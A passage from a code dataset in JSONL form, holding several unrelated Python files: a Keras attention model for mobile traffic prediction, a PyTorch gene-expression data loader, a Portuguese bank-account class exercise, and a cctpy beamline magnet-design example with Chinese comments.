= True, name = 'decoder_lstm')\n #encoder auxiliary attention parameter weight matrix\n self.aux_att = aux_att\n self.We = Dense(units = T, input_dim = 2 * encoder_latent_dim, activation = 'linear', use_bias = False, name = 'We')\n self.Ue = Dense(units = T, input_dim = T, activation = 'linear', use_bias = False, name = 'Ue')\n self.Ve = Dense(units = 1, input_dim = T, activation = 'linear', use_bias = False, name = 'Ve')\n #encooder global attention parameter weight matrix\n self.global_att = global_att\n self.neigh_num = neigh_num\n self.lamb = 1\n print('lambda:',self.lamb)\n self.Wg = Dense(units = T, input_dim = 2 * encoder_latent_dim, activation = 'linear', use_bias = False, name = 'Wg')\n self.Ug = Dense(units = T, input_dim = T, activation = 'linear', use_bias = False, name = 'Ug')\n self.Vg = Dense(units = 1, input_dim = T, activation = 'linear', use_bias = False, name = 'Vg')\n #decoder attention parameter weight matrix\n self.context_mode = context_mode\n self.Wd = Dense(units = decoder_latent_dim, input_dim = decoder_latent_dim, activation = 'linear', use_bias = False, name = 'Wd')\n self.Wd_ = Dense(units = decoder_latent_dim, input_dim = 2*encoder_latent_dim, activation = 'linear', use_bias = False, name = 'Wd_')\n self.Vd = Dense(units = 1, input_dim = decoder_latent_dim, activation = 'linear', use_bias = False, name = 'Vd')\n #output parameter matrix\n self.Wo = Dense(units = 1, activation = 'sigmoid', use_bias = True, name = 'Dense2_for_output')\n \n def encoder_attention(self,encoder_inputs, enc_attn, init_states):\n # input : encoder_inputs [batch_size, time_steps, input_dim], \n # enc_attn :attentin weight for the first timestep (ones matrix by default)\n # init_states: initial states for encoder (zeros matrix by default)\n # return : encoder_output, encoder_state, encoder_att\n [h,s] = init_states\n encoder_att = []\n encoder_output = []\n global_att = self.global_att\n aux_att = self.aux_att\n #get input\n if global_att:\n local_inputs = encoder_inputs[0]\n global_inputs = encoder_inputs[1]\n else:\n local_inputs = encoder_inputs\n \n #get att states\n if global_att:\n local_attn = enc_attn[0]\n global_attn = enc_attn[1]\n else:\n local_attn = enc_attn\n \n #local attention\n #shared layer\n AddLayer = Add(name = 'add')\n PermuteLayer = Permute(dims = (2,1))\n ActTanh = Activation(activation = 'tanh',name ='tanh_for_e')\n ActSoftmax = Activation(activation = 'softmax', name ='softmax_for_alpha')\n def local_attention(states,step):\n #for attention query\n #linear map\n Ux = self.Ue(PermuteLayer(local_inputs)) #[none,input_dim,T]\n states = Concatenate(axis = 1, name = 'state_{}'.format(step))(states)\n Whs = self.We(states) #[none, T]\n Whs = RepeatVector(local_inputs.shape[2])(Whs) #[none,input_dim,T]\n y = AddLayer([Ux, Whs])\n e = self.Ve(ActTanh(y)) #[none,input_dim,1]\n e = PermuteLayer(e) #[none,1,input_dim]\n alpha = ActSoftmax(e)\n return alpha\n \n AddLayer2 = Add(name = 'add2')\n PermuteLayer2 = Permute(dims = (2,1))\n ActTanh2 = Activation(activation = 'tanh',name ='tanh_for_e2')\n ActSoftmax2 = Activation(activation = 'softmax', name ='softmax_for_beta')\n \n def global_attention(states, step, prior):\n #for global attention query\n #global inputs[0](values) [none, T, neighbornum]\n #linear map Wg\n states = Concatenate(axis = 1, name = 'state_gl_{}'.format(step))(states)\n Wgs = self.Wg(states) #[none,T]\n Ugy = self.Ug(PermuteLayer2(global_inputs[0])) # [none, neighbornum, T]\n Wgs_ = RepeatVector(global_inputs[0].shape[2])(Wgs) # [none, neighbornum, T]\n y2 = AddLayer2([Wgs_,Ugy])\n g = self.Vg(ActTanh2(y2))\n g = PermuteLayer2(g)\n g_ = Lambda(lambda x: (1-self.lamb)*x + self.lamb*prior)(g)\n beta = ActSoftmax2(g)\n return beta\n \n for t in range(self.T):\n if global_att:\n if aux_att:\n x = Lambda(lambda x: x[:,t ,:], name = 'X_local_{}'.format(t))(local_inputs) #[none,input_dim]\n x = RepeatVector(1)(x) #[none,1,input_dim] , 1 denotes one time step\n [global_input_value,global_input_weight] = global_inputs\n x2 = Lambda(lambda x2: x2[:,t ,:], name = 'X_global_{}'.format(t))(global_input_value) #[none,neighbornum]\n x2 = RepeatVector(1)(x2) #[none,1,neighbornum] , 1 denotes one time step\n prior = Lambda(lambda p: p[:,t ,:], name = 'global_prior_{}'.format(t))(global_input_weight) #[none,neighbornum]\n prior = RepeatVector(1)(prior)\n local_x = Multiply(name = 'Xatt_local_{}'.format(t))([local_attn, x]) #[none,1,input_dim]\n print('global_attn:',global_attn, 'x2:',x2)\n global_x = Dot(axes = (2),name = 'Xatt_global_{}'.format(t))([global_attn, x2])\n #global_x = Multiply(name = 'Xatt_global_{}'.format(t))([global_attn, x2])\n att_x = Concatenate(axis = -1)([local_x, global_x])\n o, h, s = self.enLSTM(att_x, initial_state = [h, s]) #o, h, s [none, hidden_dim]\n o = RepeatVector(1)(o)\n encoder_output.append(o)\n local_attn = local_attention([h,s], t+1)\n global_attn = global_attention([h,s],t+1, prior)\n encoder_att.append([local_attn, global_attn])\n elif not aux_att:\n x = Lambda(lambda x: x[:,t ,:], name = 'X_local_{}'.format(t))(local_inputs) #[none,input_dim]\n x = RepeatVector(1)(x) #[none,1,input_dim] , 1 denotes one time step\n [global_input_value,global_input_weight] = global_inputs\n x2 = Lambda(lambda x2: x2[:,t ,:], name = 'X_global_{}'.format(t))(global_input_value) #[none,neighbornum]\n x2 = RepeatVector(1)(x2) #[none,1,neighbornum] , 1 denotes one time step\n prior = Lambda(lambda p: p[:,t ,:], name = 'global_prior_{}'.format(t))(global_input_weight) #[none,neighbornum]\n prior = RepeatVector(1)(prior)\n #global_x = Multiply(name = 'Xatt_global_{}'.format(t))([global_attn, x2])\n global_x = Dot(axes = (2),name = 'Xatt_global_{}'.format(t))([global_attn, x2])\n att_x = Concatenate(axis = -1)([x, global_x])\n o, h, s = self.enLSTM(att_x, initial_state = [h, s]) #o, h, s [none, hidden_dim]\n o = RepeatVector(1)(o)\n encoder_output.append(o)\n global_attn = global_attention([h,s],t+1, prior)\n encoder_att.append(global_attn)\n \n elif not global_att:\n if aux_att:\n x = Lambda(lambda x: x[:,t ,:], name = 'X_{}'.format(t))(local_inputs) #[none,input_dim]\n x = RepeatVector(1)(x) #[none,1,input_dim] , 1 denotes one time step\n local_x = Multiply(name = 'Xatt_{}'.format(t))([local_attn, x]) #[none,1,input_dim]\n o, h, s = self.enLSTM(local_x, initial_state = [h, s]) #o, h, s [none, hidden_dim]\n o = RepeatVector(1)(o)\n encoder_output.append(o)\n local_attn = local_attention([h,s], t+1)\n encoder_att.append(local_attn)\n elif not aux_att:\n x = Lambda(lambda x: x[:,t ,:], name = 'X_{}'.format(t))(local_inputs) #[none,input_dim]\n x = RepeatVector(1)(x) #[none,1,input_dim] , 1 denotes one time step\n o, h, s = self.enLSTM(x, initial_state = [h, s]) #o, h, s [none, hidden_dim]\n o = RepeatVector(1)(o)\n encoder_output.append(o)\n\n if global_att and aux_att:\n local_att = [i[0] for i in encoder_att]\n print('local_att', local_att)\n local_att = Concatenate(axis = 1)(local_att)\n global_att = [i[1] for i in encoder_att]\n print('global_att', global_att)\n #global_att = Concatenate(axis = 1)(global_att)\n global_att = Lambda(lambda x: K.concatenate(x, axis = 1))(global_att)\n encoder_att = [local_att, global_att]\n #elif global_att:\n # encoder_att = Concatenate(axis = 1,name = 'encoder_att')(encoder_att) #[none, T, input_dim]\n \n encoder_output = Concatenate(axis = 1, name = 'encoder_output')(encoder_output)\n \n return encoder_output, [h,s], encoder_att\n \n def decoder_attention(self, decoder_inputs,initial_state,attention_states):\n #input : decoder_inputs, intial_state, attention_states\n #return : output, state\n \n #get input\n last_inputs = decoder_inputs\n \n AddLayer = Add(name = 'add_tem')\n PermuteLayer = Permute(dims = (2,1))\n ActTanh = Activation(activation = 'tanh',name ='tanh_for_d')\n def attention(states, step):\n #return context for the t step\n Wh = self.Wd(attention_states) #[none, T, latent_dim]\n states = Concatenate(axis = 1, name = 'state_hat_{}'.format(step))(states)\n Wds = self.Wd_(states) #[none, latent_dim]\n Wds = RepeatVector(attention_states.shape[1])(Wds) #[none, T, latent_dim]\n y = AddLayer([Wds,Wh])\n u = self.Vd(ActTanh(y))#[none, T, 1]\n a = Softmax(axis = 1)(u)\n c = Dot(axes = (1))([a,attention_states]) #[none, 1, latent_dim], the summed context over encoder outputs at certain pred time step \n return c \n \n def meancontext():\n c = AveragePooling1D(pool_size = (attention_states.shape[1],))(attention_states)\n return c\n \n def lastcontext():\n c = Lambda(lambda x: x[:,-1,:], name = 'lastouput')(attention_states)\n c = RepeatVector(1)(c)\n return c\n \n \n [h,s] = initial_state\n if self.context_mode == 'att':\n context = attention([h,s],0)\n elif self.context_mode == 'mean':\n context = meancontext()\n elif self.context_mode == 'last':\n context = lastcontext()\n \n outputs =[]\n prev = None\n for t in range(self.predT):\n if not self.trainmode and t > 0 and prev is not None:\n #if decoder length is larger than 1, we calculate the prediction output for current step\n last_pred = self.Wo(prev)\n else:\n last_pred = Lambda(lambda x: x[:,t ,:], name = 'X_tem{}'.format(t))(last_inputs) #[none,decoder_input_dim]\n last_pred = RepeatVector(1)(last_pred) #[none,1,decoder_input_dim] , 1 denotes one time step\n \n x = Concatenate(axis = -1)([context,last_pred])\n o, h, s = self.deLSTM(x, initial_state = [h, s])\n if self.context_mode == 'att':\n context = attention([h,s],t+1)#[none, 1, latent_dim]\n o = RepeatVector(1)(o)\n outputs.append(o)\n prev = o\n \n if len(outputs) > 1:\n outputs = Concatenate(axis = 1, name = 'decoder_output')(outputs)\n else:\n outputs = tf.convert_to_tensor(outputs[0])\n \n print(outputs)\n return outputs,[h,s]\n \n \n def build_model(self, input_dim = 5):\n #encoder\n encoder_latent_dim = self.encoder_latent_dim\n neighnum = self.neigh_num\n T = self.T\n h0 = Input(shape = (encoder_latent_dim,),name = 'h_initial')\n s0 = Input(shape = (encoder_latent_dim,),name = 's_initial')\n enc_att_local = Input(shape = (1,input_dim),name = 'enc_att_local')\n enc_att_global = Input(shape = (1,neighnum),name = 'enc_att_global')\n encoder_inputs_local = Input(shape = (T,input_dim), name = 'encoder_input_local')\n encoder_inputs_global_value = Input(shape = (T, neighnum), name = 'encoder_input_global_value')\n encoder_inputs_global_weight = Input(shape = (T, neighnum), name = 'encoder_input_global_weight')\n if self.global_att:\n encoder_inputs = [encoder_inputs_local,[encoder_inputs_global_value,encoder_inputs_global_weight]]\n enc_att = [enc_att_local,enc_att_global]\n else:\n encoder_inputs = encoder_inputs_local\n enc_att = enc_att_local\n encoder_output, encoder_state, encoder_att = self.encoder_attention(encoder_inputs,enc_att,[h0, s0])\n \n #decoder\n dim = 1\n last_inputs = Input(shape = (None, dim))\n decoder_inputs = last_inputs\n decoder_outputs, states = self.decoder_attention(decoder_inputs, encoder_state, encoder_output)\n \n #linear transform\n output = self.Wo(decoder_outputs)\n model = Model([encoder_inputs_local, encoder_inputs_global_value,encoder_inputs_global_weight, h0, s0, enc_att_local, enc_att_global, last_inputs], output)\n \n return model\n","repo_name":"Elliebababa/Multi-Attention-Spatiotemporal-Network-for-mobile-traffic-prediction","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":17884,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"19777914554","text":"import torch\nimport torch.utils.data as Data\nimport os\nimport pdb\nimport pandas as pd\nimport numpy as np\nimport config\nimport matplotlib.pyplot as plt\n\nprint(\"Begin dataloading.py\")\n\nclass GeneDataset(Data.Dataset):\n def __init__(self, features, labels,\n label_idx_to_str, label_str_to_idx):\n super(GeneDataset, self).__init__()\n self.features = features\n self.labels = labels\n self.label_idx_to_str = label_idx_to_str\n self.label_str_to_idx = label_str_to_idx\n\n def __getitem__(self, index):\n # change behavior for np.array rather than pd DataFrame\n if isinstance(self.features, np.ndarray):\n feature = self.features[index,:]\n else:\n feature = self.features.iloc[index,:]\n\n label_str = self.labels[index]\n label_idx = self.label_str_to_idx[label_str]\n\n return np.array(feature), label_idx\n\n def __len__(self):\n return self.features.shape[0]\n\n\n################\n### DATASETS ###\n################\ndef get_dataset(is_train):\n # we have to get the labels from the HDFStore as before\n # but now we need to get the features from a numpy array\n # that Jakob is saving which is the result of the gOMP\n if is_train:\n store = pd.HDFStore(config.TRAIN_DATA_PATH)\n feature_array = config.TRAIN_DATA_NP_ARRAY \n else:\n store = pd.HDFStore(config.TEST_DATA_PATH)\n feature_array = config.TEST_DATA_NP_ARRAY\n\n # features = store['rpkm'] # (21389, 20499)\n labels = store['labels'] # (21389,)\n\n features = np.load(feature_array)\n\n\n return GeneDataset(features, labels,\n label_idx_to_str, label_str_to_idx)\n\n# the labels mapping from index to string is based off all the data\nstore = pd.HDFStore(config.DATA_PATH + \"all_data.h5\")\nlabels = store['labels']\nuniques = np.sort(np.unique(labels))\nlabel_idx_to_str = dict()\nlabel_str_to_idx = dict()\nlabel_order = []\nfor idx, str in enumerate(uniques):\n label_order.append(str)\n label_idx_to_str[idx] = str\n label_str_to_idx[str] = idx\n\nlabel_order_array = np.array(label_order)\nnp.save('labels_in_order.npy', label_order_array)\nprint('labels saved')\n\ntrain_dataset = get_dataset(is_train=True)\ntrain_loader = Data.DataLoader(train_dataset,\n batch_size = config.BATCH_SIZE,\n shuffle = True,\n drop_last = True)\n\ntest_dataset = get_dataset(is_train=False)\ntest_loader = Data.DataLoader(test_dataset,\n batch_size = config.BATCH_SIZE)\n\nprint(\"dataloading.py done!\")\n","repo_name":"DavidLBick/Single-Cell-RNA-Sequencing","sub_path":"dataloading.py","file_name":"dataloading.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30331451675","text":"class Cliente:\n def __init__(self, nome, sobrenome, cpf):\n self.nome = nome\n self.sobrenome = sobrenome\n self.cpf = cpf\n\n\nclass Data:\n def __init__(self, dia, mes, ano):\n self.dia = dia\n self.mes = mes\n self.ano = ano\n\n\nclass Historico:\n def __init__(self, data_abertura):\n self.data_abertura = data_abertura\n self.transacoes = []\n\n def registrar_transacao(self, transacao):\n self.transacoes.append(transacao)\n\n def imprime(self):\n print(f'Data de abertura da conta: {self.data_abertura.dia}/{self.data_abertura.mes}/{self.data_abertura.ano}')\n for transacao in self.transacoes:\n print(transacao)\n\n\nclass Conta:\n def __init__(self, numero, cliente, limite=0.0):\n self.numero = numero\n self.saldo = 0.0\n self.limite = limite\n self.cliente = cliente\n self.historico = Historico(Data(1, 1, 2022))\n\n def deposita(self, valor, data=None):\n if valor > 0:\n self.saldo += valor\n transacao = f'{data.dia}/{data.mes}/{data.ano} - Depósito: R$ {valor:.2f}'\n self.historico.registrar_transacao(transacao)\n return True\n return False\n\n def saca(self, valor, data=None):\n if valor <= self.saldo + self.limite:\n self.saldo -= valor\n self.limite -= (self.limite + self.saldo)\n self.saldo = 0\n transacao = f'{data.dia}/{data.mes}/{data.ano} - Saque: R$ {valor:.2f}'\n self.historico.registrar_transacao(transacao)\n return True\n return False\n\n def transfere_para(self, destino, valor, data=None):\n if valor <= self.saldo + self.limite:\n destino.deposita(valor, data)\n transacao = f'{data.dia}/{data.mes}/{data.ano} - Transferência para conta {destino.numero}: R$ {valor:.2f}'\n self.historico.registrar_transacao(transacao)\n return True\n return False\n\n def extrato(self):\n print(f'Número da conta: {self.numero}')\n print(f'Cliente: {self.cliente.nome} {self.cliente.sobrenome}')\n print(f'Saldo: R$ {self.saldo:.2f}')\n print(f'Limite: R$ {self.limite:.2f}')\n self.historico.imprime()\n\n def calcula_juros(self, taxa, data=None):\n juros = (self.saldo + abs(self.limite)) * (taxa / 100)\n self.saldo -= juros\n transacao = f'{data.dia}/{data.mes}/{data.ano} - Cálculo de juros: R$ {juros:.2f}'\n self.historico.registrar_transacao(transacao)\n\n'''EXEMPLOS: '''\n\ncliente1 = Cliente(\"Wagner\", \"Moura\", \"123456789\")\nconta1 = Conta(\"0123456\", cliente1, limite=5000)\nconta2 = Conta(\"0123457\",cliente1,limite=3000)\n\ndata_deposito = Data(10, 3, 2022)\nconta1.deposita(1000, data_deposito)\n\ndata_saque = Data(15, 3, 2022)\nconta1.saca(3000, data_saque)\n\ndata_transferencia = Data(1, 10,2023)\n\nconta1.extrato()\n\n'''Isso irá criar um cliente chamado Wagner Moura, com CPF 123456789, e uma conta com número \"0123456\"\ne limite de R$ 5000. Em seguida, é realizada uma operação de depósito no valor de R$ 1000 em 10/03/2022,\nseguida por um saque de R$ 3000 em 15/03/2022, em seguida uma transferencia de R$2000 em 1/10/2023 para conta de mesmo cliente.\nPor fim, o extrato da conta será impresso com todas as transações registradas.'''\n\n\n","repo_name":"wagnerbmoura/PycharmProjects","sub_path":"SI UFPI /Programação II - Orientada a Objetos/Q1_Trabalaho01_Alg_Programação_II.py","file_name":"Q1_Trabalaho01_Alg_Programação_II.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72963646913","text":"\"\"\"\nCCT 建模优化代码\nA15 束线 beamline 示例\n\n\n作者:赵润晓\n日期:2021年5月2日\n\"\"\"\n\nfrom os import error, path\nimport sys\nsys.path.append(path.dirname(path.abspath(path.dirname(__file__))))\n\nfrom cctpy import *\n\n\n\n\n# Beamline 表示一段竖线,它由 Line2 和 多个 Magnet 组成\n# 因此它可以看作一条二维有向曲线段,也可以看作一个磁铁\n\n\nif __name__ == \"__main__\":\n BaseUtils.i_am_sure_my_code_closed_in_if_name_equal_main()\n\n\n # 构造器\n traj = (\n Trajectory.set_start_point(P2(1,1))\n .first_line(direct=P2.y_direct(),length=1)\n .add_arc_line(radius=0.05,clockwise=True,angle_deg=90)\n .add_strait_line(1)\n .add_arc_line(radius=0.05,clockwise=True,angle_deg=90)\n .add_strait_line(1)\n .add_arc_line(radius=0.05,clockwise=True,angle_deg=90)\n .add_strait_line(0.5)\n )\n bl = Beamline(traj)\n # Plot2.plot_beamline(bl)\n # Plot2.equal()\n # Plot2.show()\n\n print(bl.magnetic_field_at(P3.random()))\n # (0.0, 0.0, 0.0)\n\n print(bl.is_out_of_aperture(P3.random()))\n # False\n\n print(bl.get_length()) # 3.7356194490192345\n print(bl.point_at(0)) # (1.0, 1.0)\n print(bl.point_at(1)) # (1.0, 2.0)\n print(bl.direct_at(0)) # (0.0, 1.0)\n print(bl.direct_at(1)) # (0.0, 1.0)\n\n bl = Beamline.set_start_point(P2(1,2)).first_drift(direct=P2(1,1),length=1)\n # Plot2.plot_beamline(bl)\n # Plot2.equal()\n # Plot2.info()\n # Plot2.show()\n\n bl.append_q(\n length=0.27,\n gradient=0.5,\n aperture_radius=100*MM\n )\n bl.append_drift(1.0)\n # Plot2.plot_beamline(bl)\n # Plot2.equal() # 坐标轴 xy 比例相同\n # Plot2.info() # 字体大小变为24\n # Plot2.show()\n\n bl.append_qs(\n length=0.5,\n gradient=0.5,\n second_gradient=0.0,\n aperture_radius=50*MM\n )\n bl.append_drift(2.0)\n # Plot2.plot_beamline(bl)\n # Plot2.equal() # 坐标轴 xy 比例相同\n # Plot2.info() # 字体大小变为24\n # Plot2.show()\n\n bl.append_dipole_cct(\n big_r=1.0,\n small_r_inner=100*MM,\n small_r_outer=150*MM,\n bending_angle=-45,\n tilt_angles=[30],\n winding_number=45,\n current=10000\n )\n bl.append_drift(2.0)\n # Plot2.plot_beamline(bl)\n # Plot2.equal() # 坐标轴 xy 比例相同\n # Plot2.info() # 字体大小变为24\n # Plot2.show()\n\n bl.append_agcct(\n big_r=3.0,\n small_rs=[200*MM,180*MM,160*MM,140*MM],\n bending_angles=[60,60,60],\n tilt_angles=[\n [30,80,90,80],\n [80,30,95,105,90,100]\n ],\n winding_numbers=[\n [120],\n [30,30,30]\n ],\n currents=[8000,-10000]\n )\n bl.append_drift(3.0)\n # Plot2.plot_beamline(bl)\n # Plot2.equal() # 坐标轴 xy 比例相同\n # Plot2.info() # 字体大小变为24\n # Plot2.show()\n\n magnets = bl.get_magnets()\n for magnet in magnets:\n print(magnet)\n # Q:local_coordinate_system=LOCATION=(1.7071067811865475, 2.7071067811865475, 0.0), xi=(-0.7071067811865476, 0.7071067811865476, 0.0), yi=(0.0, -0.0, 1.0000000000000002), zi=(0.7071067811865476, 0.7071067811865476, 0.0), length=0.27, gradient=0.5, aperture_radius=0.1\n # QS:local_coordinate_system=LOCATION=(2.605132393293463, 3.605132393293463, 0.0), xi=(-0.7071067811865476, 0.7071067811865476, 0.0), yi=(0.0, -0.0, 1.0000000000000002), zi=(0.7071067811865476, 0.7071067811865476, 0.0), length=0.5, gradient=0.5, second_gradient=0.0, aperture_radius=0.05\n # CCT: local_coordinate_system(LOCATION=(5.0800061274463895, 4.6657925650732235, 0.0), xi=(-0.7071067811865476, 0.7071067811865476, 0.0), yi=(-0.7071067811865476, -0.7071067811865476, 0.0), zi=(0.0, 0.0, 1.0))big_r(1.0)small_r(0.1)bending_angle(45.0)tilt_angles([30.0])winding_number(45)current(10000.0)starting_point_in_ksi_phi_coordinate((0.0, 0.0))end_point_in_ksi_phi_coordinate((282.7433388230814, -0.7853981633974483))disperse_number_per_winding(120)\n\n\n bl = HUST_SC_GANTRY().create_first_bending_part_beamline()\n # track = bl.track_ideal_particle(\n # kinetic_MeV=215,\n # s = 0,\n # footstep=20*MM\n # )\n # Plot3.plot_beamline(bl)\n # Plot3.plot_p3s(track,describe='k-')\n # Plot3.set_center(center=bl.point_at_middle().to_p3(),cube_size=8)\n # Plot3.show()\n\n phase_space_particle_with_distance = bl.track_phase_space_particle(\n x_mm=3.5,xp_mrad=0.0,\n y_mm=0,yp_mrad=0,\n delta=0,kinetic_MeV=215,\n s=0,footstep=20*MM\n )\n # track_in_x_plane = [\n # P2(pd.distance,pd.value.x)\n # for pd in phase_space_particle_with_distance\n # ]\n # Plot2.plot_p2s(track_in_x_plane)\n # Plot2.plot_beamline_straight(bl)\n # Plot2.show()\n\n # sx, sy = bl.track_phase_ellipse(\n # x_sigma_mm=3.5,\n # xp_sigma_mrad=7.5,\n # y_sigma_mm=3.5,\n # yp_sigma_mrad=7.5,\n # delta=0.01,\n # particle_number=8,\n # kinetic_MeV=215,\n # concurrency_level=16\n # )\n # Plot2.plot_p2s(sx,circle=True,describe='r-')\n # Plot2.plot_p2s(sy,circle=True,describe='k-')\n # Plot2.equal()\n # Plot2.info(\"mm\",\"mrad\")\n # Plot2.legend(\"x_plane\",\"y_plane\")\n # Plot2.show()\n\n print(bl)\n print(bl.__str__())\n print(bl.__repr__())\n\n # 下面以一个超导机架为例,介绍 Beamline 的使用\n #------------------ 前偏转段 ---------------#\n # 漂移段,包含 DL1 GAP1 GAP2\n DL1 = 0.8001322\n GAP1 = 0.1765959\n GAP2 = 0.2960518\n # qs 磁铁,两个 qs 磁铁 qs1 qs2,分别包括长度、孔径、梯度、二阶梯度\n qs1_length = 0.2997797\n qs1_aperture_radius = 30 * MM\n qs1_gradient = 28.33\n qs1_second_gradient = -140.44 * 2.0\n qs2_length = 0.2585548\n qs2_aperture_radius = 30 * MM\n qs2_gradient = -12.12\n qs2_second_gradient = 316.22 * 2.0\n # cct 偏转半径\n cct12_big_r = 0.95\n # cct 孔径,四层 cct,所以存在四个值\n agcct12_inner_small_r = 35 * MM\n agcct12_outer_small_r = 35 * MM + 15 * MM\n dicct12_inner_small_r = 35 * MM + 15 * MM * 2\n dicct12_outer_small_r = 35 * MM + 15 * MM * 3\n # cct 匝数,包括两段交变梯度 agcct 的匝数和一段弯曲二极 dicct 的匝数\n agcct1_winding_number = 30\n agcct2_winding_number = 39\n dicct12_winding_number = 71\n # cct 角度(偏转角度)\n dicct12_bending_angle = 22.5\n agcct1_bending_angle = 9.782608695652174\n agcct2_bending_angle = 12.717391304347826 # agcct1_bending_angle + agcct2_bending_angle = dicct12_bending_angle\n # cct 倾斜角(倾角 90 度表示不倾斜)\n dicct12_tilt_angles = [30, 80]\n agcct12_tilt_angles = [90, 30]\n # cct 电流\n dicct12_current = -6192\n agcct12_current = -3319\n #------------------ 后偏转段 ---------------#\n # 漂移段\n DL2 = 2.1162209\n GAP3 = 0.1978111\n # qs 磁铁\n qs3_length = 0.2382791\n qs3_aperture_radius = 60 * MM\n qs3_gradient = -7.3733\n qs3_second_gradient = -45.31 * 2\n # cct 偏转半径\n cct345_big_r = 0.95\n # cct 孔径\n agcct345_inner_small_r = 83 * MM\n agcct345_outer_small_r = 83 * MM + 15 * MM\n dicct345_inner_small_r = 83 * MM + 15 * MM * 2\n dicct345_outer_small_r = 83 * MM + 15 * MM * 3\n # cct 匝数\n agcct3_winding_number = 21\n agcct4_winding_number = 50\n agcct5_winding_number = 50\n dicct345_winding_number = 128\n # cct 角度(负数表示顺时针偏转)\n dicct345_bending_angle = -67.5\n agcct3_bending_angle = -(8 + 3.716404)\n agcct4_bending_angle = -(8 + 19.93897)\n agcct5_bending_angle = -(8 + 19.844626)\n # cct 倾斜角(倾角 90 度表示不倾斜)\n dicct345_tilt_angles = [30, 80]\n agcct345_tilt_angles = [90, 30]\n # cct 电流\n dicct345_current = 9664\n agcct345_current = -6000\n\n # 一匝 cct 离散的电流元数目,设为 36 个\n part_per_winding = 36\n\n\n #------------------ 使用 Beamline 构建束线 ---------------#\n #------------------ 前偏转段 ---------------#\n beamline = (\n Beamline.set_start_point(P2.origin()) # 设置束线的起点\n .first_drift(direct=P2.x_direct(), length=DL1) # 设置束线中第一个漂移段(束线必须以漂移段开始)\n .append_agcct( # 尾接 acgcct\n big_r=cct12_big_r, # 偏转半径\n # 二极 CCT 和四极 CCT 孔径\n small_rs=[dicct12_outer_small_r,dicct12_inner_small_r,agcct12_outer_small_r,agcct12_inner_small_r],\n bending_angles=[agcct1_bending_angle,agcct2_bending_angle], # agcct 每段偏转角度\n tilt_angles=[dicct12_tilt_angles,agcct12_tilt_angles], # 二极 CCT 和四极 CCT 倾斜角\n winding_numbers=[[dicct12_winding_number],[agcct1_winding_number,agcct2_winding_number]], # 二极 CCT 和四极 CCT 匝数\n currents=[dicct12_current,agcct12_current], # 二极 CCT 和四极 CCT 电流\n disperse_number_per_winding=part_per_winding # 每匝分段数目\n )\n .append_drift(GAP1) # 尾接漂移段\n .append_qs( # 尾接 QS 磁铁\n length=qs1_length,\n gradient=qs1_gradient,\n second_gradient=qs1_second_gradient,\n aperture_radius=qs1_aperture_radius\n )\n .append_drift(GAP2)\n .append_qs(\n length=qs2_length,\n gradient=qs2_gradient,\n second_gradient=qs2_second_gradient,\n aperture_radius=qs2_aperture_radius\n )\n .append_drift(GAP2)\n .append_qs(\n length=qs1_length,\n gradient=qs1_gradient,\n second_gradient=qs1_second_gradient,\n aperture_radius=qs1_aperture_radius\n )\n .append_drift(GAP1)\n .append_agcct(\n big_r=cct12_big_r,\n small_rs=[dicct12_outer_small_r,dicct12_inner_small_r,agcct12_outer_small_r,agcct12_inner_small_r],\n bending_angles=[agcct2_bending_angle,agcct1_bending_angle],\n tilt_angles=[dicct12_tilt_angles,agcct12_tilt_angles],\n winding_numbers=[[dicct12_winding_number],[agcct2_winding_number,agcct1_winding_number]],\n currents=[dicct12_current,agcct12_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(DL1)\n )\n\n # 束线长度\n beamline_length_part1 = beamline.get_length()\n print(f\"前偏转段束线长度为{beamline_length_part1}m\")\n\n # 绘制前偏转段图\n # Plot2.equal()\n # Plot2.plot(beamline)\n # Plot2.show()\n\n #------------------ 后偏转段 ---------------#\n beamline = (\n beamline.append_drift(DL2)\n .append_agcct(\n big_r=cct345_big_r,\n small_rs=[dicct345_outer_small_r,dicct345_inner_small_r,agcct345_outer_small_r,agcct345_inner_small_r],\n bending_angles=[agcct3_bending_angle,agcct4_bending_angle,agcct5_bending_angle],\n tilt_angles=[dicct345_tilt_angles,agcct345_tilt_angles],\n winding_numbers=[[dicct345_winding_number], [agcct3_winding_number,agcct4_winding_number,agcct5_winding_number]],\n currents=[dicct345_current,agcct345_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(GAP3)\n .append_qs(\n length=qs3_length,\n gradient=qs3_gradient,\n second_gradient=qs3_second_gradient,\n aperture_radius=qs3_aperture_radius\n )\n .append_drift(GAP3)\n .append_agcct(\n big_r=cct345_big_r,\n small_rs=[dicct345_outer_small_r,dicct345_inner_small_r,agcct345_outer_small_r,agcct345_inner_small_r],\n bending_angles=[agcct5_bending_angle,agcct4_bending_angle,agcct3_bending_angle],\n tilt_angles=[dicct345_tilt_angles,agcct345_tilt_angles],\n winding_numbers=[[dicct345_winding_number], [agcct5_winding_number,agcct4_winding_number,agcct3_winding_number]],\n currents=[dicct345_current,agcct345_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(DL2)\n )\n\n beamline_length = beamline.get_length()\n print(f\"总束线长度为{beamline_length}m\")\n\n # 绘制后偏转段图\n # Plot2.equal()\n # Plot2.plot(beamline)\n # Plot2.show()\n\n #------------------ 定义束流,并进行粒子跟踪,绘制相椭圆 ---------------#\n\n # 设置束流参数,并进行粒子跟踪\n # 返回一个长度 2 的元素,表示相空间 x-xp 平面和 y-yp 平面上粒子投影\n xxp,yyp = beamline.track_phase_ellipse(\n x_sigma_mm=3.5,\n xp_sigma_mrad=7.5,\n y_sigma_mm=3.5,\n yp_sigma_mrad=7.5,\n delta=0.0,\n particle_number=6, # 粒子数目\n kinetic_MeV=215,\n s=beamline_length_part1, # 束流起点,设为 beamline_length_part1,即后偏转段的起点\n footstep=20*MM, # 粒子运动步长\n concurrency_level=16\n )\n\n # Plot2.info(x_label='x/mm',y_label='xp/mrad',title='x-xp')\n # Plot2.plot(xxp,describe='bo')\n # Plot2.show()\n\n # Plot2.info(x_label='y/mm',y_label='yp/mrad',title='y-yp')\n # Plot2.plot(yyp,describe='bo')\n # Plot2.show()\n\n\n # 